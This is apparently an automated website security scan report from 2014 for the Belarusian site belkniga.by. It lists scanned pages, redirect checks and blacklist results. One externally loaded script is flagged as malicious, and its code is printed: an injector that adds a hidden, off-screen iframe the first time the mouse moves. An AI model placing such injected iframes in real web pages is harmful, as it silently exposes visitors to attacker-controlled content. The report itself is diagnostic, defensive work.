Scanned pages/files
Request | Server response | Status |
http://belkniga.by/ | 200 OK Content-Length: 59730 Content-Type: text/html | clean |
http://belkniga.by/js/common.js | 200 OK Content-Length: 614 Content-Type: application/javascript | clean |
http://belkniga.by/js/head.js | 200 OK Content-Length: 3686 Content-Type: application/javascript | clean |
http://belkniga.by/js/Hover.js | 200 OK Content-Length: 838 Content-Type: application/javascript | clean |
http://belkniga.by/100idei_rb_brsm.html | 200 OK Content-Length: 19775 Content-Type: text/html | clean |
http://newdomme.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://belkniga.by/index.html | 200 OK Content-Length: 59730 Content-Type: text/html | clean |
http://belkniga.by/bel-rus.html | 200 OK Content-Length: 27727 Content-Type: text/html | clean |
http://belkniga.by/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 23:03:31 GMT Location: http://belkniga.by/index.html Server: nginx/1.2.3 Content-Length: 213 Content-Type: text/html; charset=iso-8859-1 | clean |
http://belkniga.by/news/news233.html | 200 OK Content-Length: 24901 Content-Type: text/html | clean |
http://belkniga.by/news/../js/common.js | 200 OK Content-Length: 614 Content-Type: application/javascript | clean |
http://belkniga.by/news/../js/head.js | 200 OK Content-Length: 3686 Content-Type: application/javascript | clean |
http://belkniga.by/news/../js/Hover.js | 200 OK Content-Length: 838 Content-Type: application/javascript | clean |
http://belkniga.by/news/ | 200 OK Content-Length: 12462 Content-Type: text/html | clean |
http://belkniga.by/news/David_Almond.jpg | 200 OK Content-Length: 29211 Content-Type: image/jpeg | clean |
http://belkniga.by/news/IMG_5313.jpg | 200 OK Content-Length: 26977 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belkniga.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 23:03:26 GMT
Accept-Ranges: bytes
ETag: "16b0852-e952-503dee0482200"
Server: nginx/1.2.3
Content-Length: 59730
Content-Type: text/html
Last-Modified: Thu, 25 Sep 2014 07:37:44 GMT
...59730 bytes of data.
GET / HTTP/1.1
Host: belkniga.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 23:03:26 GMT
Accept-Ranges: bytes
ETag: "16b0852-e952-503dee0482200"
Server: nginx/1.2.3
Content-Length: 59730
Content-Type: text/html
Last-Modified: Thu, 25 Sep 2014 07:37:44 GMT
...59730 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: belkniga.by
Referer: http://www.google.com/search?q=belkniga.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: belkniga.by
Referer: http://www.google.com/search?q=belkniga.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belkniga.by
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://belkniga.by/
Result: belkniga.by is not infected or malware details are not published yet.
Result: belkniga.by is not infected or malware details are not published yet.